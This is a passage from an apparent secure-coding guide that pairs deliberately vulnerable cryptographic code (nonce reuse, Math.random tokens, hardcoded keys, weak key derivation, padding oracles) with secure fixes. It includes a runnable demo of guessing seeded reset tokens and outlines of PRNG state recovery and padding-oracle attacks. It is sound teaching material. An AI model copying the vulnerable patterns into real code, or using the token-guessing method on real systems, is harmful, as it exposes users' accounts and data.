// - XOR of plaintext1 and plaintext2
// - Eventually recover the authentication key H
// - Forge arbitrary messages with valid tags

// This is a CATASTROPHIC failure of GCM mode
// "Nonce misuse resistance" modes exist (GCM-SIV) for this reason
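
The confidentiality half of this failure (recovering the XOR of two plaintexts) can be reproduced with a toy counter-mode cipher in Python. The keystream here is built from SHA-256 purely for demonstration and is NOT a real cipher; it stands in for the CTR layer inside GCM. Recovering the authentication key is not shown.

```python
import hashlib


def toy_keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Toy counter-mode keystream built from SHA-256. Demonstration only."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def toy_encrypt(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    return xor_bytes(plaintext, toy_keystream(key, nonce, len(plaintext)))


key = b"k" * 32
reused_nonce = b"\x00" * 12
p1 = b"transfer 100 to alice"
p2 = b"transfer 999 to carol"
c1 = toy_encrypt(key, reused_nonce, p1)
c2 = toy_encrypt(key, reused_nonce, p2)

# The shared keystream cancels out: the attacker learns p1 XOR p2 without the key.
leaked = xor_bytes(c1, c2)
# Knowing or guessing one plaintext then reveals the other completely.
recovered_p2 = xor_bytes(leaked, p1)
```

Generating a fresh nonce for every message under a given key removes the shared keystream and with it this attack.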

BAD Example 4: Using Math.random() for Security Purposes

// VULNERABLE: Math.random for token generation
function generateResetToken():
    token = ""
    for i in range(32):
        token = token + toString(floor(random() * 16), base = 16)
    return token

// VULNERABLE: Math.random for session ID
function createSessionId():
    return "session_" + toString(random() * 1000000000)

// VULNERABLE: Seeded random with predictable seed
function generateApiKey(userId):
    setSeed(userId * getCurrentTimestamp())
    key = ""
    for i in range(32):
        key = key + randomChoice(ALPHANUMERIC_CHARS)
    return key

// VULNERABLE: Using non-crypto random for encryption IV
function quickEncrypt(data, key):
    iv = []
    for i in range(16):
        iv.append(floor(random() * 256))
    return AES_CBC_encrypt(key, iv, data)

// VULNERABLE: JavaScript Math.random() is NOT cryptographic
function generateToken():
    return btoa(String.fromCharCode.apply(null,
        Array.from({length: 32}, () => Math.floor(Math.random() * 256))
    ))

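Why this is dangerous:

Math.random() uses a predictable pseudorandom number generator (PRNG).
Its internal state can be recovered from observed outputs: a handful of consecutive values is enough for V8's xorshift128+, and 624 consecutive 32-bit outputs for a Mersenne Twister.
Once the state is known, all past and future values can be predicted.
Session tokens, API keys, and reset tokens become guessable.
Many PRNG implementations have short periods or weak seeding.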

State recovery attack:

// Attacker collects multiple password reset tokens
tokens_observed = [
    "a3f7c2e9b1d4...",  // Token 1
    "8e2a5f1c9b3d...",  // Token 2
    // ... collect ~30-50 tokens
]

// Using z3 SMT solver or custom reversing:
function recoverMathRandomState(observed_outputs):
    // V8's xorshift128+ can be reversed
    // Once state recovered, predict next token
    state = reverseEngineerState(observed_outputs)
    next_token = predictNextOutput(state)
    return next_token

// Attacker generates password reset for victim
// Then predicts the token value
// Completes password reset without email access
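A simpler variant of the same weakness needs no state recovery at all: if the seed is guessable, the attacker just replays the generator. The sketch below assumes Python, whose `random` module is a Mersenne Twister, and contrasts it with the `secrets` module. `weak_token` and `strong_token` are hypothetical names, and the user ID and timestamp are made-up values.

```python
import random
import secrets


def weak_token(user_id: int, timestamp: int) -> str:
    """VULNERABLE: Mersenne Twister seeded from guessable inputs."""
    rng = random.Random(user_id * timestamp)
    return "".join(rng.choice("0123456789abcdef") for _ in range(32))


def strong_token() -> str:
    """SECURE: 32 bytes (256 bits) from the OS CSPRNG, URL-safe encoded."""
    return secrets.token_urlsafe(32)


# The victim's token, issued at a time the attacker can narrow down.
victim_token = weak_token(user_id=4242, timestamp=1_700_000_000)

# The attacker tries every second in a small window around the request.
guesses = {
    weak_token(4242, t)
    for t in range(1_700_000_000 - 5, 1_700_000_000 + 5)
}
attacker_wins = victim_token in guesses
```

Ten guesses are enough here because the only unknown is the second in which the token was issued.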

Bad Example 5: Hardcoded Symmetric Keys

// VULNERABLE: Key in source code
ENCRYPTION_KEY = "MySecretKey12345"

function encryptUserData(data):
    return AES_encrypt(ENCRYPTION_KEY, data)

// VULNERABLE: Key derived from application constant
function getEncryptionKey():
    return sha256(APPLICATION_NAME + ENVIRONMENT + "secret")

// VULNERABLE: Same key for all users
MASTER_KEY = bytes.fromhex("0123456789abcdef0123456789abcdef")

function encryptForUser(userId, data):
    return AES_encrypt(MASTER_KEY, data)

// VULNERABLE: Key in configuration file (committed to git)
// config.py:
CRYPTO_CONFIG = {
    "encryption_key": "dGhpcyBpcyBhIHNlY3JldCBrZXk=",  // Base64 encoded
    "hmac_key": "another_secret_key_here"
}

// VULNERABLE: Weak key (too short)
function quickEncrypt(data):
    key = "short"  // 5 bytes, not 16/24/32
    return AES_encrypt(pad(key, 16), data)  // Padded with zeros!

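Why this is dangerous:

Keys in source code persist permanently in version control history.
Hardcoded keys cannot be rotated without deploying new code.
Decompiling or inspecting a binary exposes the embedded key.
A single key compromise affects all encrypted data.
Weak or short keys can be brute-forced.
Keys derived from predictable inputs can be reconstructed by an attacker.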
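One way to keep the key out of source control is to load it from configuration at startup and refuse to run without it. The sketch below assumes a base64-encoded 256-bit key in an environment variable; the variable name `APP_ENCRYPTION_KEY` and the `KeyConfigError` class are hypothetical, and a secrets manager or KMS is generally a stronger choice than the process environment.

```python
import base64
import os


class KeyConfigError(RuntimeError):
    """Raised when the key is missing or malformed."""


def load_encryption_key(var_name: str = "APP_ENCRYPTION_KEY") -> bytes:
    """Load a base64-encoded 256-bit key from the environment.

    Fails loudly instead of falling back to a built-in default.
    """
    encoded = os.environ.get(var_name)
    if not encoded:
        raise KeyConfigError(f"{var_name} is not set")
    try:
        key = base64.b64decode(encoded, validate=True)
    except ValueError as exc:  # binascii.Error is a ValueError subclass
        raise KeyConfigError(f"{var_name} is not valid base64") from exc
    if len(key) != 32:
        raise KeyConfigError(f"{var_name} must decode to 32 bytes, got {len(key)}")
    return key
```

The important design choice is the absence of a default value: a missing key stops the application rather than silently encrypting with a constant.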

Bad Example 6: Weak Key Derivation

// VULNERABLE: Direct use of password as key
function deriveKey(password):
    return password.encode()[:32]  // Truncate or pad to key size

// VULNERABLE: Simple hash as key derivation
function passwordToKey(password):
    return sha256(password)  // Single round, no salt

// VULNERABLE: MD5-based key derivation
function getKeyFromPassword(password, salt):
    return md5(password + salt)

// VULNERABLE: Insufficient iterations
function deriveKeyPBKDF2(password, salt):
    return PBKDF2(password, salt, iterations = 1000)
    // 2025 recommendation: minimum 600,000 for SHA256

// VULNERABLE: Using key derivation output directly for multiple purposes
function setupCrypto(password, salt):
    derived = PBKDF2(password, salt, iterations = 100000, keyLength = 64)
    encryptionKey = derived[:32]   // First half
    hmacKey = derived[32:]         // Second half
    // Problem: related keys, should use separate derivations

// VULNERABLE: Weak salt (too short, predictable, or reused)
function deriveKeyWithWeakSalt(password):
    salt = "salt"  // Static salt defeats purpose
    return PBKDF2(password, salt, iterations = 100000)

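Why this is dangerous:

Using a password directly as the key leaves the key space no larger than a password dictionary.
Single-hash derivation allows GPU-accelerated brute force.
Low iteration counts for PBKDF2 or bcrypt make offline guessing cheap.
MD5-based key derivation inherits all of MD5's weaknesses.
Static or weak salts allow precomputation attacks.
Related-key derivation may expose cryptographic weaknesses.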

Iteration count guidance (2025):

// PBKDF2-SHA256 minimum iterations by use case:
// - Interactive login (100ms budget): 600,000 iterations
// - Background/async (1s budget): 2,000,000 iterations
// - High-security (offline storage): 10,000,000 iterations

// bcrypt cost factor:
// - Minimum 2025: cost = 12 (about 250ms)
// - Recommended: cost = 13-14
// - High-security: cost = 15+

// Argon2id parameters (2025):
// - Memory: 64 MB minimum, 256 MB recommended
// - Iterations: 3 minimum
// - Parallelism: match available cores
// - Argon2id recommended over Argon2i or Argon2d
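As a rough illustration of the PBKDF2 figures above, the following sketch uses Python's `hashlib.pbkdf2_hmac`. The storage format (`pbkdf2_sha256$iterations$salt$hash`) and the function names are assumptions for this example, not a standard. Storing the iteration count alongside the hash is what allows it to be raised later without invalidating existing records.

```python
import hashlib
import hmac
import secrets

PBKDF2_ITERATIONS = 600_000  # interactive-login figure from the guidance above


def hash_password(password: str, iterations: int = PBKDF2_ITERATIONS) -> str:
    """Return 'pbkdf2_sha256$<iterations>$<salt hex>$<hash hex>'."""
    salt = secrets.token_bytes(16)  # unique random salt per password
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, iterations
    )
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and count, then compare in constant time."""
    scheme, iterations, salt_hex, hash_hex = stored.split("$")
    if scheme != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest, bytes.fromhex(hash_hex))
```

Where a maintained Argon2id or bcrypt binding is available, it is usually preferable to PBKDF2; this sketch only covers the case where the standard library is all there is.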

Good Examples: Secure Cryptographic Patterns

Good Example 1: Proper Password Hashing with bcrypt/Argon2

// SECURE: bcrypt with appropriate cost factor
function hashPassword(password):
    // Cost factor 12 = ~250ms on modern hardware
    // Increase cost factor annually as hardware improves
    cost = 12
    return bcrypt.hash(password, cost)

function verifyPassword(password, storedHash):
    // bcrypt.verify handles timing-safe comparison internally
    return bcrypt.verify(password, storedHash)

// SECURE: Argon2id (recommended for new applications)
function hashPasswordArgon2(password):
    // Argon2id: hybrid resistant to both side-channel and GPU attacks
    options = {
        type: ARGON2ID,
        memoryCost: 65536,    // 64 MB
        timeCost: 3,          // 3 iterations
        parallelism: 4,       // 4 parallel threads
        hashLength: 32        // 256-bit output
    }
    return argon2.hash(password, options)

function verifyPasswordArgon2(password, storedHash):
    return argon2.verify(storedHash, password)

// SECURE: scrypt for memory-hard hashing
function hashPasswordScrypt(password):
    // N = CPU/memory cost (power of 2)
    // r = block size
    // p = parallelization parameter
    salt = generateSecureRandom(16)
    hash = scrypt(password, salt, N = 2^17, r = 8, p = 1, keyLen = 32)
    return encodeSaltAndHash(salt, hash)

// SECURE: Migrating from weak to strong hashing
function upgradePasswordHash(userId, password, currentHash):
    // Verify against old hash
    if legacyVerify(password, currentHash):
        // Re-hash with modern algorithm
        newHash = hashPasswordArgon2(password)
        database.update("users", userId, {"password_hash": newHash})
        return true
    return false

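Why this is secure:

bcrypt, Argon2, and scrypt are deliberately slow; Argon2 and scrypt are also memory-hard.
Salt generation and storage are built in.
Verification functions include a timing-safe comparison.
A configurable work factor lets the cost keep pace with faster hardware.
Argon2id resists both GPU attacks and side-channel attacks.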

Good Example 2: Authenticated Encryption (GCM Mode)

// SECURE: AES-256-GCM with proper nonce handling
function encryptAESGCM(plaintext, key):
    // Generate cryptographically random 96-bit nonce
    nonce = generateSecureRandom(12)

    cipher = createCipher("AES-256-GCM", key)
    cipher.setNonce(nonce)

    // Optional: Add authenticated additional data (AAD)
    // AAD is authenticated but NOT encrypted
    aad = "context:user_data:v1"
    cipher.setAAD(aad)

    ciphertext = cipher.encrypt(plaintext)
    authTag = cipher.getAuthTag()  // 128-bit tag

    // Return nonce + tag + ciphertext (all needed for decryption)
    return nonce + authTag + ciphertext

function decryptAESGCM(encryptedData, key):
    // Extract components
    nonce = encryptedData[:12]
    authTag = encryptedData[12:28]
    ciphertext = encryptedData[28:]

    cipher = createCipher("AES-256-GCM", key)
    cipher.setNonce(nonce)
    cipher.setAAD("context:user_data:v1")  // Must match encryption
    cipher.setAuthTag(authTag)

    try:
        plaintext = cipher.decrypt(ciphertext)
        return plaintext
    catch AuthenticationError:
        // Tag verification failed - data tampered or wrong key
        log.warn("Decryption authentication failed - possible tampering")
        return null

// SECURE: XChaCha20-Poly1305 (extended nonce variant)
function encryptXChaCha(plaintext, key):
    // 192-bit nonce - safe for random generation
    nonce = generateSecureRandom(24)

    ciphertext, tag = xchachapoly.encrypt(key, nonce, plaintext)

    return nonce + tag + ciphertext

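Why this is secure:

GCM provides both confidentiality and integrity.
The authentication tag detects any tampering.
A random 96-bit nonce is safe for up to about 2^32 messages per key.
XChaCha20 uses a 192-bit nonce, which is safe for random generation across a practically unlimited number of messages.
AAD binds the ciphertext to its context (prevents cross-context attacks).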

Good Example 3: Proper IV/Nonce Generation

// SECURE: Random IV for CBC mode
function encryptCBC(plaintext, key):
    // 128-bit random IV for AES
    iv = generateSecureRandom(16)

    cipher = createCipher("AES-256-CBC", key)
    ciphertext = cipher.encrypt(plaintext, iv)

    // Prepend IV to ciphertext (IV doesn't need to be secret)
    return iv + ciphertext

function decryptCBC(encryptedData, key):
    iv = encryptedData[:16]
    ciphertext = encryptedData[16:]

    cipher = createCipher("AES-256-CBC", key)
    return cipher.decrypt(ciphertext, iv)

// SECURE: Counter-based nonce with random prefix (for GCM)
class SecureNonceGenerator:
    // Random 32-bit prefix + 64-bit counter
    // Safe for 2^64 messages with same key

    function __init__():
        this.prefix = generateSecureRandom(4)  // 32-bit random
        this.counter = 0
        this.lock = Mutex()

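    function generate():
        this.lock.acquire()
        try:
            // Check before incrementing so the counter never wraps
            if this.counter >= 2^64 - 1:
                throw Error("Nonce counter exhausted - rotate key")
            this.counter = this.counter + 1
            return this.prefix + intToBytes(this.counter, 8)
        finally:
            // Always release, including when the exhaustion error is thrown
            this.lock.release()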

// SECURE: Synthetic IV (SIV) for nonce-misuse resistance
function encryptSIV(plaintext, key):
    // AES-GCM-SIV: Safe even if nonce is accidentally repeated
    nonce = generateSecureRandom(12)
    ciphertext = AES_GCM_SIV_encrypt(key, nonce, plaintext)
    return nonce + ciphertext
    // Note: Repeated nonce only leaks if same plaintext encrypted

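Why this is secure:

Random IVs prevent pattern analysis across messages.
Prepending the IV to the ciphertext ensures it is always available for decryption.
A counter with a random prefix makes nonce collisions between instances unlikely.
SIV mode provides a safety net against accidental nonce reuse.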

Good Example 4: Cryptographically Secure Random Numbers

// SECURE: Using OS/platform CSPRNG

// Node.js
function generateSecureRandom(length):
    return crypto.randomBytes(length)

// Python
function generateSecureRandom(length):
    return secrets.token_bytes(length)

// Java
function generateSecureRandom(length):
    random = SecureRandom.getInstanceStrong()
    bytes = new byte[length]
    random.nextBytes(bytes)
    return bytes

// Go
function generateSecureRandom(length):
    bytes = make([]byte, length)
    _, err = crypto_rand.Read(bytes)
    if err != nil:
        panic("CSPRNG failure")
    return bytes

// SECURE: Token generation for URLs/APIs
function generateUrlSafeToken(length):
    // Generate random bytes, encode to URL-safe base64
    randomBytes = generateSecureRandom(length)
    return base64UrlEncode(randomBytes)

function generateResetToken():
    // 256 bits of entropy for password reset token
    return generateUrlSafeToken(32)

function generateApiKey():
    // Prefix for identification + random component
    prefix = "sk_live_"
    randomPart = generateUrlSafeToken(24)
    return prefix + randomPart

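// SECURE: Random number in range
function secureRandomInt(min, max):
    range = max - min + 1
    bytesNeeded = ceil(log2(range) / 8)
    if bytesNeeded < 1:
        bytesNeeded = 1  // range == 1 still needs one byte

    // Largest multiple of range that fits in bytesNeeded bytes
    // (integer division; without floor() nothing is ever rejected)
    limit = floor(2^(bytesNeeded*8) / range) * range

    // Rejection sampling to avoid modulo bias
    while true:
        randomBytes = generateSecureRandom(bytesNeeded)
        value = bytesToInt(randomBytes)
        if value < limit:
            return min + (value % range)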

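Why this is secure:

A CSPRNG (cryptographically secure pseudorandom number generator) draws on operating system entropy sources.
Its output stays unpredictable even to someone who has seen every previous output.
Proper rejection sampling avoids modulo bias.
Standard libraries provide secure defaults when used correctly.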
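In Python, the token and range helpers above map onto the `secrets` module. The sketch below writes out the rejection-sampling loop for illustration; in practice `low + secrets.randbelow(high - low + 1)` gives the same uniform result in one call. The function names are hypothetical.

```python
import secrets


def generate_reset_token() -> str:
    """256 bits from the OS CSPRNG, URL-safe base64 without padding."""
    return secrets.token_urlsafe(32)


def secure_random_int(low: int, high: int) -> int:
    """Uniform integer in [low, high] via rejection sampling (no modulo bias)."""
    if low > high:
        raise ValueError("low must not exceed high")
    span = high - low + 1
    n_bytes = max(1, (span.bit_length() + 7) // 8)
    space = 1 << (8 * n_bytes)
    limit = (space // span) * span  # largest multiple of span that fits
    while True:
        value = int.from_bytes(secrets.token_bytes(n_bytes), "big")
        if value < limit:  # reject the biased tail and draw again
            return low + (value % span)
```

For a six-sided die, one byte gives 256 values and `limit` is 252, so the four values 252 to 255 are discarded instead of being folded onto 0 to 3.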

Good Example 5: Key Derivation Functions

// SECURE: PBKDF2 with sufficient iterations
function deriveKeyPBKDF2(password, purpose):
    // Generate unique salt per derivation
    salt = generateSecureRandom(16)

    // 600,000 iterations minimum for SHA-256 (2025)
    iterations = 600000

    // Derive key of required length
    derivedKey = PBKDF2(
        password = password,
        salt = salt,
        iterations = iterations,
        keyLength = 32,  // 256 bits
        hashFunction = SHA256
    )

    // Store salt with derived key for later verification
    return {salt: salt, key: derivedKey}

// SECURE: HKDF for deriving multiple keys from one secret
function deriveMultipleKeys(masterSecret, purpose):
    // HKDF-Extract: Create pseudorandom key from input
    salt = generateSecureRandom(32)
    prk = HKDF_Extract(salt, masterSecret)

    // HKDF-Expand: Derive purpose-specific keys
    encryptionKey = HKDF_Expand(prk, info = "encryption", length = 32)
    hmacKey = HKDF_Expand(prk, info = "authentication", length = 32)
    searchKey = HKDF_Expand(prk, info = "search-index", length = 32)

    return {
        encryption: encryptionKey,
        hmac: hmacKey,
        search: searchKey,
        salt: salt  // Store for re-derivation
    }

// SECURE: Argon2 for password-based key derivation
function deriveKeyFromPassword(password, salt = null):
    if salt == null:
        salt = generateSecureRandom(16)

    derivedKey = argon2id(
        password = password,
        salt = salt,
        memoryCost = 65536,    // 64 MB
        timeCost = 3,
        parallelism = 4,
        outputLength = 32
    )

    return {key: derivedKey, salt: salt}

// SECURE: Key derivation with domain separation
function deriveKeyWithContext(masterKey, context, subkeyId):
    // Context prevents cross-purpose key use
    info = context + ":" + subkeyId
    return HKDF_Expand(masterKey, info, 32)

// Example: Derive per-user encryption keys
function getUserEncryptionKey(masterKey, userId):
    return deriveKeyWithContext(masterKey, "user-data-encryption", userId)

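Why this is secure:

High iteration counts make brute force impractical.
HKDF properly separates multiple keys derived from the same source.
Domain separation prevents a key derived for one purpose from being used for another.
Argon2 is memory-hard, which blunts GPU attacks.
A unique salt per derivation prevents precomputation attacks.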
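HKDF is small enough to write out with only `hmac` and `hashlib`, which makes the extract and expand steps concrete. The sketch below follows the construction in RFC 5869 with SHA-256; the helper `derive_subkeys` and its info labels are assumptions for illustration. A maintained library implementation is preferable in production code.

```python
import hashlib
import hmac

HASH_LEN = hashlib.sha256().digest_size  # 32 bytes


def hkdf_extract(salt: bytes, ikm: bytes) -> bytes:
    """HKDF-Extract: PRK = HMAC-SHA256(salt, IKM)."""
    if not salt:
        salt = bytes(HASH_LEN)  # RFC 5869 default: HashLen zero bytes
    return hmac.new(salt, ikm, hashlib.sha256).digest()


def hkdf_expand(prk: bytes, info: bytes, length: int) -> bytes:
    """HKDF-Expand: T(i) = HMAC(PRK, T(i-1) || info || i)."""
    if length > 255 * HASH_LEN:
        raise ValueError("requested output too long")
    okm = b""
    block = b""
    counter = 1
    while len(okm) < length:
        block = hmac.new(prk, block + info + bytes([counter]), hashlib.sha256).digest()
        okm += block
        counter += 1
    return okm[:length]


def derive_subkeys(master_secret: bytes, salt: bytes) -> dict:
    """Derive independent keys by varying only the info label."""
    prk = hkdf_extract(salt, master_secret)
    return {
        "encryption": hkdf_expand(prk, b"encryption", 32),
        "hmac": hkdf_expand(prk, b"authentication", 32),
    }
```

Because the info label is part of every HMAC input, two labels yield unrelated outputs even though the master secret and salt are identical.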

Good Example 6: Key Rotation Patterns

// SECURE: Key versioning for rotation
class KeyManager:
    function __init__(keyStore):
        this.keyStore = keyStore
        this.currentKeyVersion = keyStore.getCurrentVersion()

    function encrypt(plaintext):
        key = this.keyStore.getKey(this.currentKeyVersion)
        nonce = generateSecureRandom(12)

        ciphertext = AES_GCM_encrypt(key, nonce, plaintext)

        // Include key version in output for decryption
        return encodeVersionedCiphertext(
            version = this.currentKeyVersion,
            nonce = nonce,
            ciphertext = ciphertext
        )

    function decrypt(encryptedData):
        version, nonce, ciphertext = decodeVersionedCiphertext(encryptedData)

        // Fetch correct key version (may be old version)
        key = this.keyStore.getKey(version)
        if key == null:
            throw KeyNotFoundError("Key version " + version + " not available")

        return AES_GCM_decrypt(key, nonce, ciphertext)

    function rotateKey():
        newVersion = this.currentKeyVersion + 1
        newKey = generateSecureRandom(32)
        this.keyStore.storeKey(newVersion, newKey)
        this.currentKeyVersion = newVersion

        // Schedule background re-encryption of old data
        scheduleReEncryption(newVersion - 1, newVersion)

// SECURE: Re-encryption during key rotation
function reEncryptData(dataId, oldVersion, newVersion, keyManager):
    // Fetch encrypted data
    encryptedData = database.get("encrypted_data", dataId)

    // Verify it uses old key version
    currentVersion = extractKeyVersion(encryptedData)
    if currentVersion >= newVersion:
        return  // Already using new or newer key

    // Decrypt with old key, re-encrypt with new
    plaintext = keyManager.decrypt(encryptedData)
    newEncryptedData = keyManager.encrypt(plaintext)

    // Atomic update
    database.update("encrypted_data", dataId, {
        "data": newEncryptedData,
        "key_version": newVersion,
        "rotated_at": getCurrentTimestamp()
    })

// SECURE: Key wrapping for storage
function storeEncryptionKey(keyToStore, masterKey):
    // Wrap (encrypt) the key with master key
    nonce = generateSecureRandom(12)
    wrappedKey = AES_GCM_encrypt(masterKey, nonce, keyToStore)

    return {
        wrapped_key: wrappedKey,
        nonce: nonce,
        algorithm: "AES-256-GCM",
        created_at: getCurrentTimestamp()
    }

function retrieveEncryptionKey(wrappedKeyData, masterKey):
    return AES_GCM_decrypt(
        masterKey,
        wrappedKeyData.nonce,
        wrappedKeyData.wrapped_key
    )

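Why this is secure:

Key versioning keeps old data decryptable during rotation.
Background re-encryption gradually migrates all data to the new key.
Key wrapping protects stored keys at rest.
Gradual rotation minimizes operational risk.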

Edge Cases Section

Edge Case 1: Padding Oracle Vulnerabilities

// VULNERABLE: Revealing padding validity in error messages
function decryptCBC_vulnerable(ciphertext, key, iv):
    try:
        plaintext = AES_CBC_decrypt(key, iv, ciphertext)
        unpadded = removePKCS7Padding(plaintext)
        return {success: true, data: unpadded}
    catch PaddingError:
        return {success: false, error: "Invalid padding"}  // ORACLE!
    catch DecryptionError:
        return {success: false, error: "Decryption failed"}

// Attack: Padding oracle allows full plaintext recovery
// Attacker modifies ciphertext bytes, observes padding errors
// ~128 requests per byte to recover plaintext (on average)

// SECURE: Use authenticated encryption (GCM) or constant-time handling
// encKey and macKey are independent keys; never reuse the encryption key for the MAC
function decryptCBC_secure(ciphertext, encKey, macKey, iv):
    try:
        // First verify HMAC before any decryption
        providedHmac = ciphertext[-32:]
        ciphertextData = ciphertext[:-32]

        expectedHmac = HMAC_SHA256(macKey, iv + ciphertextData)
        if not constantTimeEquals(providedHmac, expectedHmac):
            return {success: false, error: "Decryption failed"}  // Generic error

        plaintext = AES_CBC_decrypt(encKey, iv, ciphertextData)
        unpadded = removePKCS7Padding(plaintext)
        return {success: true, data: unpadded}
    catch:
        return {success: false, error: "Decryption failed"}  // Same error always

// BEST: Just use GCM which prevents this class of attack entirely

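Lessons learned:

Never reveal whether padding was valid or invalid.
Always use authenticated encryption (encrypt-then-MAC or GCM).
Return the same error message for every decryption failure.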

Edge Case 2: Length Extension Attacks

// VULNERABLE: Using hash(secret + message) for authentication
function createAuthToken(secretKey, message):
    return sha256(secretKey + message)  // Length extension vulnerable!

function verifyAuthToken(secretKey, message, token):
    expected = sha256(secretKey + message)
    return token == expected

// Attack: Attacker knows hash(secret + message) and length of secret
// Can compute hash(secret + message + padding + attacker_data)
// Without knowing the secret!

// Example attack:
// Original: hash(secret + "amount=100") = abc123...
// Attacker computes: hash(secret + "amount=100" + padding + "&amount=999")
// Server verifies this as valid!

// SECURE: Use HMAC
function createAuthTokenSecure(secretKey, message):
    return HMAC_SHA256(secretKey, message)

function verifyAuthTokenSecure(secretKey, message, token):
    expected = HMAC_SHA256(secretKey, message)
    return constantTimeEquals(token, expected)

// WEAKER ALTERNATIVE: hash(message + secret) blocks length extension,
// but any collision in the hash breaks it; HMAC is preferred
// SECURE: Use SHA-3 or SHA-512/256 (resistant to length extension)
function alternativeAuth(secretKey, message):
    return SHA3_256(secretKey + message)  // SHA-3 is resistant

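Lessons learned:

Never use hash(secret + message) for authentication.
HMAC is specifically designed to prevent length extension.
The SHA-3 family is resistant to length extension, but HMAC is still recommended for consistency.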
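A minimal Python rendering of the HMAC approach, using only the standard library, might look like the following. The function names mirror the pseudocode above and are otherwise hypothetical.

```python
import hashlib
import hmac


def create_auth_token(secret_key: bytes, message: bytes) -> str:
    """HMAC-SHA256 tag over the message, hex encoded."""
    return hmac.new(secret_key, message, hashlib.sha256).hexdigest()


def verify_auth_token(secret_key: bytes, message: bytes, token: str) -> bool:
    """Recompute the tag and compare in constant time."""
    expected = create_auth_token(secret_key, message)
    # Encode to bytes so non-ASCII input cannot make compare_digest raise.
    return hmac.compare_digest(expected.encode(), token.encode())
```

An attacker who appends `&amount=999` to the message cannot produce a matching tag, because HMAC's nested keyed hashing leaves no exposed internal state to extend.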

Edge Case 3: Timing Attacks on Comparison

// VULNERABLE: Early-exit string comparison
function verifyToken(providedToken, expectedToken):
    if length(providedToken) != length(expectedToken):
        return false
    for i in range(length(providedToken)):
        if providedToken[i] != expectedToken[i]:
            return false  // Early exit reveals position of first difference
    return true

// Attack: Timing differences reveal correct characters
// Correct first char: ~1μs longer than wrong first char
// Attacker can brute-force character-by-character

// VULNERABLE: Using == operator (language-dependent timing)
function checkHmac(provided, expected):
    return provided == expected  // May have variable-time implementation

// SECURE: Constant-time comparison
function constantTimeEquals(a, b):
    if length(a) != length(b):
        // Still constant-time for the comparison
        // Length difference may leak - consider padding
        return false

    result = 0
    for i in range(length(a)):
        // XOR and OR accumulate differences without early exit
        result = result | (a[i] XOR b[i])
    return result == 0

// SECURE: Using crypto library comparison
function verifyHmacSecure(message, providedHmac, key):
    expectedHmac = HMAC_SHA256(key, message)
    return crypto.timingSafeEqual(providedHmac, expectedHmac)

// SECURE: Double-HMAC comparison (timing-safe by design)
function verifyWithDoubleHmac(message, providedMac, key):
    expectedMac = HMAC_SHA256(key, message)
    // Compare HMACs of the MACs - timing doesn't leak original MAC
    return HMAC_SHA256(key, providedMac) == HMAC_SHA256(key, expectedMac)

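Lessons learned:

Use constant-time comparison for every operation involving secrets.
Most languages have crypto libraries that include timing-safe comparison functions.
The double-HMAC trick works when a constant-time comparison is unavailable.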
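The difference between the early-exit loop and the accumulate-then-check loop is easiest to see side by side. The sketch below is illustrative only: an interpreted loop in Python gives no real timing guarantee, so `hmac.compare_digest` is the function to call in practice. `naive_equals` and `constant_time_equals` are hypothetical names.

```python
import hmac


def naive_equals(a: bytes, b: bytes) -> bool:
    """VULNERABLE pattern: returns at the first mismatching byte."""
    if len(a) != len(b):
        return False
    for x, y in zip(a, b):
        if x != y:
            return False  # running time depends on the mismatch position
    return True


def constant_time_equals(a: bytes, b: bytes) -> bool:
    """Accumulate differences with XOR/OR so every byte is always visited."""
    if len(a) != len(b):
        return False
    diff = 0
    for x, y in zip(a, b):
        diff |= x ^ y
    return diff == 0


def verify_mac(provided: bytes, expected: bytes) -> bool:
    """Preferred: the standard library's timing-safe comparison."""
    return hmac.compare_digest(provided, expected)
```

All three functions return the same answers; they differ only in how much the running time reveals about where the inputs diverge.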

Edge Case 4: Key Reuse Across Contexts

// VULNERABLE: Same key for encryption and authentication
SHARED_KEY = loadKey("master")

function encryptData(data):
    return AES_GCM_encrypt(SHARED_KEY, generateNonce(), data)

function signData(data):
    return HMAC_SHA256(SHARED_KEY, data)  // Same key!

// Problem: Cryptographic interactions between uses
// Some attacks become possible when key is used in multiple algorithms

// VULNERABLE: Same key for different users/tenants
function encryptForTenant(tenantId, data):
    return AES_GCM_encrypt(MASTER_KEY, generateNonce(), data)
    // All tenants share encryption key - one compromise = all compromised

// SECURE: Derive separate keys for each purpose
MASTER_KEY = loadKey("master")

function getEncryptionKey():
    return HKDF_Expand(MASTER_KEY, "encryption-aes-256-gcm", 32)

function getAuthenticationKey():
    return HKDF_Expand(MASTER_KEY, "authentication-hmac-sha256", 32)

function getSearchKey():
    return HKDF_Expand(MASTER_KEY, "searchable-encryption", 32)

// SECURE: Per-tenant key derivation
function getTenantEncryptionKey(tenantId):
    // Each tenant gets unique derived key
    info = "tenant-encryption:" + tenantId
    return HKDF_Expand(MASTER_KEY, info, 32)

function encryptForTenantSecure(tenantId, data):
    tenantKey = getTenantEncryptionKey(tenantId)
    return AES_GCM_encrypt(tenantKey, generateNonce(), data)

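Lessons learned:

Always derive separate keys for different cryptographic operations.
Use domain separation in HKDF (a different "info" parameter per purpose).
Per-tenant or per-user key derivation limits the blast radius of a compromise.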

Common Mistakes Section

Common Mistake 1: Using Encryption Without Authentication

// COMMON MISTAKE: CBC encryption without HMAC
function encryptDataWrong(data, key):
    iv = generateSecureRandom(16)
    ciphertext = AES_CBC_encrypt(key, iv, data)
    return iv + ciphertext
    // Missing: No way to detect tampering!

// Attack: Bit-flipping in CBC mode
// Flipping bit N in ciphertext block C[i] flips bit N in plaintext block P[i+1]
// Attacker can modify data without detection

// Example: Encrypted JSON {"admin": false, "amount": 100}
// Attacker can flip bits to change "false" to "true" or modify amount

// CORRECT: Encrypt-then-MAC
function encryptDataCorrect(data, encKey, macKey):
    iv = generateSecureRandom(16)
    ciphertext = AES_CBC_encrypt(encKey, iv, data)

    // MAC covers IV and ciphertext
    mac = HMAC_SHA256(macKey, iv + ciphertext)

    return iv + ciphertext + mac

function decryptDataCorrect(encrypted, encKey, macKey):
